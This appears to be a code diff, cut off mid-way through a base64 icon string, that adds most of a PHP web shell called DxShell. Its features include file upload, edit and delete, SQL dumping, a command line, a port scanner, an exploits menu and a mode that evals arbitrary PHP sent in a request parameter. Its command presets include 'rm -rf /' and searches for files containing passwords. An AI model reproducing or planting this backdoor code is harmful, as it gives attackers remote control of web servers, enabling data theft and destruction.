+	for ($i=0, $INDEXES=array_keys($_COOKIE),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_COOKIE[ $INDEXES[$i] ]= stripslashes($_COOKIE[ $INDEXES[$i] ]); }
+	}
+
+$GLOB['FILES']['CurDIR']=getcwd();
+
+$GLOB['SYS']['GZIP']['CanUse']=$GLOB['SYS']['GZIP']['CanOutput']=false;
+if (isset($_GET['dx_gzip']) OR isset($_POST['dx_gzip']))
+	{
+	$GLOB['SYS']['GZIP']['CanUse']=extension_loaded("zlib");
+	if (extension_loaded("zlib"))
+		if (!(strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip')===FALSE))
+			$GLOB['SYS']['GZIP']['CanOutput']=TRUE;
+	};
+$GLOB['SYS']['GZIP']['IMG']=extension_loaded("zlib");
+
+$GLOB['SYS']['OS']['id']=($GLOB['FILES']['CurDIR'][1]==':')?'Win':'Nix';
+$GLOB['SYS']['OS']['Full']=getenv('OS');
+if (empty($GLOB['SYS']['OS']['Full']))
+	{
+	$GLOB['SYS']['OS']['id'] = getenv('OS');
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] = php_uname(); }
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] ='???';}
+	else {if(@eregi("^win",$GLOB['SYS']['OS']['id'])) $GLOB['SYS']['OS']['id']='Win'; else $GLOB['SYS']['OS']['id']='Nix';}
+	}
+
+
+$GLOB['DxMODES']=array(
+	'WTF'		=>	'AboutBox',
+
+	'DIR'		=>	'Dir browse',
+	'UPL'		=>	'Upload file',
+	'FTP'		=>	'FTP Actions',
+
+	'F_CHM'		=>	'File CHMOD',
+	'F_VIEW'	=>	'File viewer',
+	'F_ED'		=>	'File Edit',
+	'F_DEL'		=>	'File Delete',
+	'F_REN'		=>	'File Rename',
+	'F_COP'		=>	'File Copy',
+	'F_MOV'		=>	'File Move',
+	'F_DWN'		=>	'File Download',
+
+	'SQL'		=>	'SQL Maintenance',
+	'SQLS'		=>	'SQL Search',
+	'SQLD'		=>	'SQL Dump',
+	'PHP'		=>	'PHP C0nsole',
+	'COOK'		=>	'Cookies Maintenance',
+	'CMD'		=>	'C0mmand line',
+
+	'MAIL'		=>	'Mail functions',
+	'STR'		=>	'String functions',
+	'PRT'		=>	'Port scaner',
+	'SOCK'		=>	'Raw s0cket',
+	'PROX'		=>	'HTTP PROXY',
+	'XPL'		=>	'Expl0its',
+	'XSS'		=>	'XSS Server',
+	);
+$GLOB['DxGET_Vars']=array(/* GET variables used by shell */
+'dxinstant', 'dxmode', 'dximg', 'dxparam', 'dxval', 'dx_ok', 'dx_gzip',
+'dxdir', 'dxdirsimple', 'dxfile',
+'dxsql_s', 'dxsql_l', 'dxsql_p', 'dxsql_d','dxsql_q',
+);
+
+$GLOB['VAR']['PHP']['Presets']=array(
+	/* Note, that no comments are allowed in the code */
+	'phpinfo'	=>	'phpinfo();',
+	'GLOBALS'	=>	'print \'<plaintext>\'; print_r($GLOBALS);',
+	'php_ini'	=>	'$INI=ini_get_all(); '
+		."\n".'print \'<table border=0><tr>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Param</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Global value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Local Value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';'
+		."\n".'foreach ($INI as $param => $values) '
+		."\n\t".'print "\n".\'<tr>\''
+		."\n\t\t".'.\'<td class="listing"><b>\'.$param.\'</td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';',
+	'extensions'	=>	'$EXT=get_loaded_extensions ();'
+		."\n".'print \'<table border=0><tr><td class="listing">\''
+		."\n\t".'.implode(\'</td></tr>\'."\n".\'<tr><td class="listing">\', $EXT)'
+		."\n\t".'.\'</td></tr></table>\''
+		."\n\t".'.count($EXT).\' extensions loaded\';',
+	);
+$GLOB['VAR']['CMD']['Presets']=array(
+	'Call Nik8 with an axe'=>'[w0rning] rm -rf /',
+	'show opened ports'=>'netstat -an | grep -i listen',
+	'find config* files'=>'find / -type f -name "config*"',
+	'find all *.php files with word "password"'=>'find / -name *.php | xargs grep -li password',
+	'find all writable directories and files'=>'find / -perm -2 -ls',
+	'list file attribs on a second extended FS'=>'lsattr -va',
+	'View syslog.conf'=>'cat /etc/syslog.conf',
+	'View Message of the day'=>'cat /etc/motd',
+	'View hosts'=>'cat /etc/hosts',
+	'List processes'=>'ps auxw',
+	'List user processes'=>'ps ux',
+	'Locate httpd.conf'=>'locate httpd.conf',
+	'Interfaces'=>'ifconfig',
+	'CPU'=>'/proc/cpuinfo',
+	'RAM'=>'free -m',
+	'HDD'=>'df -h',
+	'OS Ver'=>'sysctl -a | grep version',
+	'Kernel ver' =>'cat /proc/version',
+	'Is cURL installed? ' => 'which curl',
+	'Is wGET installed? ' => 'which wget',
+	'Is lynx installed? ' => 'which lynx',
+	'Is links installed? ' => 'which links',
+	'Is fetch installed? ' => 'which fetch',
+	'Is GET installed? ' => 'which GET',
+	'Is perl installed? ' => 'which perl',
+	'Where is apache ' => 'whereis apache',
+	'Where is perl ' => 'whereis perl',
+	'Pack directory' =>'"tar -zc /path/ -f name.tar.gz"',
+	);
+
+
+###################################################################################
+####################+++++++++# F U N C T I O N S #+++++++++++++####################
+###################################################################################
+function DxError($errstr)
+{global $DX_Header_drawn;
+print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr>'
+	.'<td class=error '.((!$DX_Header_drawn)?'style="color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;position:absolute;top=0;left=0;"':'').'>'
+	.'Err: '.$errstr.'</td></tr></table>'."\n\n"; return '';}
+
+function DxWarning($warn)
+{print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr><td class=warning><b>W0rning:</b> '.$warn.'</td></tr></table>'."\n\n"; return '';}
+
+function DxImg($imgname)
+{
+global $DXGLOBALSHIT;
+if ($DXGLOBALSHIT) return '<font class="img_replacer">'.$imgname.'</font>'; /* globalshit doesn't give a chance for our images to survive */
+return '<img src="'.DxURL('kill', '').'&dxmode=IMG&dximg='.$imgname.'" title="'.$imgname.'" alt"'.$imgname.'">';
+}
+
+function DxSetCookie($name, $val, $exp)
+{
+if (!headers_sent()) return setcookie($name, $val, $exp, '/');
+?>
+<script>
+var curCookie = "<?=$name;?>=" + escape("<?=$val;?>") +"; expires=<?=date('l, d-M-y H:i:s', $exp);?> GMT; path=/;";
+document.cookie = curCookie;
+</script>
+<?
+}
+
+function DxRandom($range='48-57,65-90,97-122')
+{
+$range=explode(',',$range);
+$range=explode('-',	$range[  rand(0,count($range)-1)  ]   );
+return rand($range[0],$range[1]);
+}
+
+function DxRandomChars($num)
+{
+$ret='';
+for ($i=0;$i<$num;$i++) $ret.=chr(DxRandom('48-57,65-90,97-122'));
+return $ret;
+}
+
+function DxZeroedNumber($int, $totaldigits)
+{
+$str=(string)$int;
+while (strlen($str)<$totaldigits) $str='0'.$str;
+return $str;
+}
+
+function DxPrint_ParamState($name, $state, $invert=false)
+{
+print $name.' : '; $invert=(bool)$invert;
+if (is_bool($state))
+		 print ($state)?'<font color=#'.(($invert)?'FF0000':'00FF00').'><b>ON</b></font>':'<font color=#'.(($invert)?'00FF00':'FF0000').'><b>OFF</b></font>';
+	else print '<b>'.$state.'</b>';
+}
+
+function DxStr_FmtFileSize($size)
+{
+	if($size>= 1073741824)  {$size = round($size / 1073741824 * 100) / 100 . " GB";	}
+elseif($size>= 1048576) 	{$size = round($size / 1048576 * 100) / 100 . " MB";	}
+elseif($size>= 1024) 		{$size = round($size / 1024 * 100) / 100 . " KB";		}
+					   else {$size = $size . " B";}
+return $size;
+}
+
+function DxDate($UNIX) {return date('d.M\'Y H:i:s', $UNIX); }
+
+function DxDesign_DrawBubbleBox($header, $body, $width)
+{
+$header=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $header);
+$body=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $body);
+return ' onmouseover=\'showwin("'.$header.'","'.$body.'",'.$width.',1)\' onmouseout=\'showwin("","",0,0)\' onmousemove=\'movewin()\' ';
+}
+
+function DxChmod_Str2Oct($str)   /*  rwxrwxrwx => 0777 */
+{
+$str = str_pad($str,9,'-');
+$str=strtr($str,	array('-'=>'0','r'=>'4','w'=>'2','x'=>'1')		);
+$newmode='';
+for ($i=0; $i<3; $i++) $newmode .= $str[$i*3]+$str[$i*3+1]+$str[$i*3+2];
+
+return $newmode;
+}
+
+function DxChmod_Oct2Str($perms) /* 777 => rwxrwxrwx. USE ONLY STRING REPRESENTATION OF $oct !!!! */
+{
+$info='';
+if (($perms & 0xC000) == 0xC000) $info = 'S'; /*  Socket */
+	elseif (($perms & 0xA000) == 0xA000) $info = 'L'; /* Symbolic Link */
+elseif (($perms & 0x8000) == 0x8000) $info = '&nbsp;'; /* '-'*//* Regular */
+elseif (($perms & 0x6000) == 0x6000) $info = 'B';  /* Block special */
+elseif (($perms & 0x4000) == 0x4000) $info = 'D'; /* Directory*/
+elseif (($perms & 0x2000) == 0x2000) $info = 'C'; /* Character special*/
+elseif (($perms & 0x1000) == 0x1000) $info = 'P'; /* FIFO pipe*/
+else $info = '?'; /* Unknown */
+if (!empty($info)) $info='<font class=rwx_sticky_bit>'.$info.'</font>';
+/* Owner */
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+		(($perms & 0x0800) ? 's' : 'x' ) :
+		(($perms & 0x0800) ? 'S' : '-'));
+$info .= '/';
+/* Group */
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+		(($perms & 0x0400) ? 's' : 'x' ) :
+		(($perms & 0x0400) ? 'S' : '-'));
+$info .= '/';
+/* World */
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+		(($perms & 0x0200) ? 't' : 'x' ) :
+		(($perms & 0x0200) ? 'T' : '-'));
+
+ return $info;
+}
+
+function DxFileToUrl($filename)
+{/* kills & and = to be okay in URL */
+return str_replace(array('&','=','\\'), array('%26', '%3D','/'), $filename);
+}
+
+function DxFileOkaySlashes($filename)
+{return str_replace('\\', '/', $filename);}
+
+function DxURL($do='kill', $these='') /* kill: '' - kill all ours, 'a,b,c' - kill $a,$b,$c ; leave: '' - as is, leave 'a,b,c' - leave only $a,$b,$c */
+{
+global $GLOB;
+if ($these=='') $these=$GLOB['DxGET_Vars']; else $these=explode(',', $these);
+
+$ret=$_SERVER['PHP_SELF'].'?';
+if (!empty($_GET))
+	for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+		if ( !in_array($INDEXES[$i], $GLOB['DxGET_Vars']) OR ( /* if not ours - add */
+			($do=='kill' AND !in_array($INDEXES[$i], $these))
+			OR
+			($do=='leave' AND in_array($INDEXES[$i], $these))
+			 ))
+			$ret.=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+if (substr($ret, -1,1)=='&') $ret=substr($ret, 0, strlen($ret)-1);
+return $ret;
+}
+
+function DxGETinForm($do='kill', $these='') /* Equal to DxURL(), but prints out $_GET as form <input type=hidden> params */
+{
+$link=substr(strchr(DxURL($do, $these), '?'), 1);
+$link=explode('&', $link);
+print "\n".'<!--$_GET;-->';
+for ($i=0, $COUNT=count($link); $i<$COUNT; $i++)
+	{
+	$cur=explode('=', $link[$i]);
+	print '<input type=hidden name="'.str_replace('"', '&quot;', $cur[0]).'" value="'.str_replace('"', '&quot;', $cur[1]).'">';
+	}
+}
+
+function DxGotoURL($URL, $noheaders=false)
+{
+if ($noheaders or headers_sent())
+	{
+	print "\n".'<div align=center>Redirecting...<br><a href="'.$URL.'">Press here in shit happens</a>';
+	print '<script>location="'.$URL.'";</script>';
+	/* print $str.='<META HTTP-EQUIV="Refresh" Content="1, URL='.$URL.'">'; */
+	}
+	else
+	header('Location: '.$URL);
+return 1;
+}
+
+if (!function_exists('mime_content_type'))
+	{
+	if ($GLOB['SYS']['OS']['id']!='Win')
+		{	function mime_content_type($f)
+			{
+			$f = @escapeshellarg($f);
+			return @trim(`file -bi `.$f);
+			}
+			}
+		else
+		{
+			function mime_content_type($f) {return 'Content-type: text/plain';} /* Nothing alike under win =( if u have some thoughts - touch me */
+		}
+	}
+
+
+function DxMySQL_FetchResult($MySQL_res, &$MySQL_Return_Array, $idmode=false) /* Fetches mysql return array (associative) */
+{
+$MySQL_Return_Array=array();
+
+if ($MySQL_res===false) return 0;
+if ($MySQL_res===true)	return 0;
+
+$ret=mysql_num_rows($MySQL_res); if ($ret<=0) return 0;
+
+if ($idmode) while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_NUM))===FALSE)) {}
+	else	 while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_ASSOC))===FALSE)) {}
+array_pop($MySQL_Return_Array);
+
+for ($i=0; $i<count($MySQL_Return_Array); $i++) /* Kill the fucking slashes */
+	{
+	if ($i==0)
+		{
+		$INDEXES=array_keys($MySQL_Return_Array[$i]);
+		$count=count($INDEXES);
+		}
+	for ($j=0; $j<$count; $j++)
+		{
+		$key=&$INDEXES[$j];
+		$val=&$MySQL_Return_Array[$i][$key];
+		if (is_string($val)) $val=stripcslashes($val);
+		}
+	}
+return $ret;
+}
+
+function DxMySQLQ($query, $die_on_err)
+{
+$q=mysql_query($query);
+if (mysql_errno()!=0)
+	{
+	DxError('" '.$query.' "'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error());
+	if ($die_on_err) die();
+	}
+return $q;
+}
+
+function DxDecorVar(&$var, $htmlstr)
+{
+if (is_null($var)) return 'NULL';
+if (!isset($var)) return '[!isset]';
+
+if (is_bool($var))		return ($var)?'true':'false';
+if (is_int($var))   	return (int)$var;
+if (is_float($var)) 	return number_format($var, 4, '.', '');
+if (is_string($var))
+	{
+	if (empty($var)) return '&nbsp;';
+	if (!$htmlstr)	return ''.($var).'';
+			   else return ''.str_replace("\n", "<br>", str_replace("\r","", htmlspecialchars($var))).'';
+	}
+if (is_array($var))		return '(ARR)'.var_export($var, true).'(/ARR)';
+if (is_object($var))	return '(OBJ)'.var_export($var, true).'(/OBJ)';
+if (is_resource($var))	return '(RES:'.get_resource_type($var).')'.var_export($var, true).'(/RES)';
+return '(???)'.var_export($var, true).'(/???)';
+}
+
+function DxHTTPMakeHeaders($method='', $URL='', $host='', $user_agent='', $referer='', $posts=array(), $cookie=array())
+{
+if (!empty($posts))
+	{
+	$postValues='';
+	foreach( $posts AS $name => $value ) {$postValues .= urlencode( $name ) . "=" . urlencode( $value ) . '&';}
+	$postValues = substr( $postValues, 0, -1 );
+	$method = 'POST';
+	} else $postValues = '';
+
+ if (!empty($cookie))
+	{
+	$cookieValues='';
+	foreach( $cookie AS $name => $value ) {$cookieValues .= urlencode( $name ) . "=" . urlencode( $value ) . ';';}
+	$cookieValues = substr( $cookieValues, 0, -1 );
+	} else $cookieValues = '';
+
+$request  = $method.' '.$URL.' HTTP/1.1'."\r\n";
+if (!empty($host))			$request .= 'Host: '.$host."\r\n";
+if (!empty($cookieValues))	$request .='Cookie: '.$cookieValues."\r\n";
+if (!empty($user_agent))	$request .= 'User-Agent: '.$user_agent.' '."\r\n";
+$request .= 'Connection: Close'."\r\n"; /* Or connection will be endless */
+if (!empty($referer))		$request .= 'Referer: '.$referer."\r\n";
+if ( $method == 'POST' )
+	{
+	$lenght = strlen( $postValues );
+	$request .= 'Content-Type: application/x-www-form-urlencoded'."\r\n";
+	$request .= 'Content-Length: '.$lenght."\r\n";
+	$request .= "\r\n";
+	$request .= $postValues;
+	}
+$request.="\r\n\r\n";
+return $request;
+}
+
+function DxFiles_UploadHere($path, $filename, &$contents)
+{
+if (empty($contents)) die(DxError('Received empty'));
+$filename='__DxS__UPLOAD__'.DxRandomChars(3).'__'.$filename;
+if (!($f=fopen($path.$filename, 'w')))
+	{
+	$path='/tmp/';
+	if (!($f=fopen($path.$filename, 'w')))
+		die(DxError('Writing denied. Save to "'.$path.$filename.'" also failed! =('));
+		else
+		DxWarning('Writing failed, but saved to "'.$path.$filename.'"! =)');
+	}
+fputs($f, $contents);
+fclose($f);
+print "\n".'Saved file to "'.$path.$filename.'" - OK';
+print "\n".'<br><a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($path)).'">[Go DIR]</a>';;
+}
+
+function DxExecNahuj($cmd, &$OUT, &$RET) /* returns the name of function that exists, or FALSE */
+{
+$OUT=array(); $RET='';
+if (function_exists('exec'))
+	{
+	if (!empty($cmd)) exec($cmd, $OUT, $RET); /* full array output */
+	return array(true,true,'exec', '');
+	}
+	elseif  (function_exists('shell_exec'))
+	{
+	if (!empty($cmd)) $OUT[0]=shell_exec($cmd); /* full string output, no RETURN */
+	return array(true,false,'shell_exec', '<s>exec</s> shell_exec');
+	}
+	elseif  (function_exists('system'))
+	{
+	if (!empty($cmd)) $OUT[0]=system($cmd, $RET); /* last line of output */
+	return array(true,false,'system', '<s>exec</s> <s>shell_exec</s> system<br>Only last line of output is available, sorry =(');
+	}
+	else return array(FALSE, FALSE, '&lt;noone&gt;', '<s>exec</s> <s>shell_exec</s> <s>system</s> Bitchy admin has disabled command line!! =(');;
+}
+
+###################################################################################
+#####################++++++++++++# L O G I N #++++++++++++++++#####################
+###################################################################################
+if (   isset($_GET['dxmode'])?$_GET['dxmode']=='IMG':false   )
+	{ /* IMGS are allowed without passwd =) */
+	$GLOB['SHELL']['USER']['Login']='';
+	$GLOB['SHELL']['USER']['Passw']='';
+	}
+
+if (	isset($_GET['dxinstant'])?$_GET['dxinstant']=='logoff':false   )
+	{
+	if ($DXGLOBALSHIT)
+		{
+		if (isset($_COOKIE['DxS_AuthC'])) DxSetCookie('DxS_AuthC','---', 1);
+		}
+		else
+		{
+		header('WWW-Authenticate: Basic realm="==== HIT CANCEL OR PRESS ESC ===='.base_convert(crc32(mt_rand(0, time())),10,36).'"');
+		header('HTTP/1.0 401 Unauthorized');
+		}
+
+	print '<html>Redirecting... press <a href="'.DxURL('kill','').'">here if shit happens</a>';
+	DxGotoURL(DxURL('kill',''), '1noheaders');
+	die();
+	}
+
+if (((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2))
+	{
+	if ($DXGLOBALSHIT)
+		{
+		if (isset($_POST['DxS_Auth']) or isset($_COOKIE['DxS_AuthC']))
+			{
+			if (!(
+
+				((@$_POST['DxS_Auth']['L']==$GLOB['SHELL']['USER']['Login']) AND /* form */
+				(@$_POST['DxS_Auth']['P']==$GLOB['SHELL']['USER']['Passw']
+							OR
+				(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND @$_POST['DxS_Auth']['P']==md5($GLOB['SHELL']['USER']['Passw']))
+				))
+						OR
+				@$_COOKIE['DxS_AuthC']==md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']) /* cookie */
+
+				))
+				{print(DxError('Fucked off brutally'));unset($_POST['DxS_Auth'], $_COOKIE['DxS_AuthC']);}
+				else DxSetCookie('DxS_AuthC', md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']), time()+60*60*24*2);
+				}
+		if (!isset($_POST['DxS_Auth']) AND !isset($_COOKIE['DxS_AuthC']))
+			{
+			print "\n".'<form action="'.DxURL('kill', '').'" method=POST style="position:absolute;z-index:100;top:0pt;left:40%;width:100%;height:100%;">';
+			print "\n".'<br><input type=text name="DxS_Auth[L]" value="<LOGIN>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=text name="DxS_Auth[P]" value="<PASSWORD>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=submit value="Ok" style="width:200pt;"></form>';
+			print "\n".'</form>';
+			die();
+			}
+		}
+		else
+		{
+		if (!isset($_SERVER['PHP_AUTH_USER']))
+			{
+			header('WWW-Authenticate: Basic realm="DxShell '.$GLOB['SHELL']['Ver'].' Auth"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+			else
+			if (!(	$_SERVER['PHP_AUTH_USER']==$GLOB['SHELL']['USER']['Login']
+			AND (
+					$_SERVER['PHP_AUTH_PW']==$GLOB['SHELL']['USER']['Passw']
+								OR
+					(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND md5($_SERVER['PHP_AUTH_PW'])==$GLOB['SHELL']['USER']['Passw'])
+					)
+					))
+			{
+			header('WWW-Authenticate: Basic realm="DxS '.$GLOB['SHELL']['Ver'].' Auth: Fucked off brutally"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+		}
+	}
+
+###################################################################################
+####################++++++# I N S T A N T    U S A G E #+++++++####################
+###################################################################################
+if (!isset($_GET['dxmode'])) $_GET['dxmode']='DIR'; else $_GET['dxmode']=strtoupper($_GET['dxmode']);
+if ($_GET['dxmode']=='DDOS') /* DDOS mode. In other case, EVALer of everything that comes in $_GET['s_php'] OR $_POST['s_php']  */
+	{
+	$F = $_GET + $_POST;
+	if (!isset($F['s_php'])) die('o_O Tync DDOS Remote Shell '.$GLOB['SHELL']['Ver']."\n".'<br>Use GET or POST to set "s_php" variable with code to be executed =)<br>Enjoy!');
+	eval(stripslashes($F['s_php']));
+	die("\n\n".'<br><br>'.'o_O Tync DDOS Web Shell '.$GLOB['SHELL']['Ver'].((!isset($F['s_php']))?"\n".'<br>'.'$s_php is responsible for php-code-injection':''));
+	}
+if ($_GET['dxmode']=='IMG')
+	{
+	$IMGS=array(
+		'DxS'	=> 'R0lGODlhEAAQAIAAAAD/AAAAACwAAAAAEAAQAAACL4yPGcCs2NqLboGFaXW3X/tx2WcZm0luIcqFKyuVHRSLJOhmGI4mWqQAUoKPYqIAADs=',
+		'folder'=> 'R0lGODlhDwAMAJEAAP7rhriFIP///wAAACH5BAEAAAIALAAAAAAPAAwAAAIklIJhywcPVDMBwpSo3U/WiIVJxG0IWV7Vl4Joe7Jp3HaHKAoFADs=',
+		'foldup'=> 'R0lGODlhDwAMAJEAAP7rhriFIAAAAP///yH5BAEAAAMALAAAAAAPAAwAAAIw3IJiywcgRGgrvCgA2tNh/Dxd8JUcApWgaJFqxGpp+GntFV4ZauV5xPP5JIeTcVIAADs=',
+		'view'	=> 'R0lGODlhEAAJAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQAAkAAAIglB8Zx6aQYGIRyCpFsFY9jl1ft4Fe2WmoZ1LROzWIIhcAOw==',
+		'del'	=> 'R0lGODlhEAAQAKIAAIoRGNYnOtclPv///////wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAANASArazQ4MGOcLwb6BGQBYBknhR3zhRHYUKmQc65xgKM+0beKn3fErm2bDqomIRaMluENhlrcFaEejPKgL3qmRAAA7',
+		'copy'	=> 'R0lGODlhEAAQAKIAAP//lv///3p6egAAAP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM+SKrT7isOQGsII7Jq7/sTdWEh53FAgwLjILxp2WGculIurL68XsuonCAG6PFSvxvuuDMOQcCaZuJ8TqGQSAIAOw==',
+		'move'	=> 'R0lGODlhEAAQAJEAADyFFLniPu79wP///yH5BAEAAAMALAAAAAAQABAAAAI3nD8AyAgiVnMihDidldmAnXFfIB6Pomwo9kCu5bqpRdf18qGjTpom6AkBO4lhqHLhCHtEj/JQAAA7',
+		'exec'	=> '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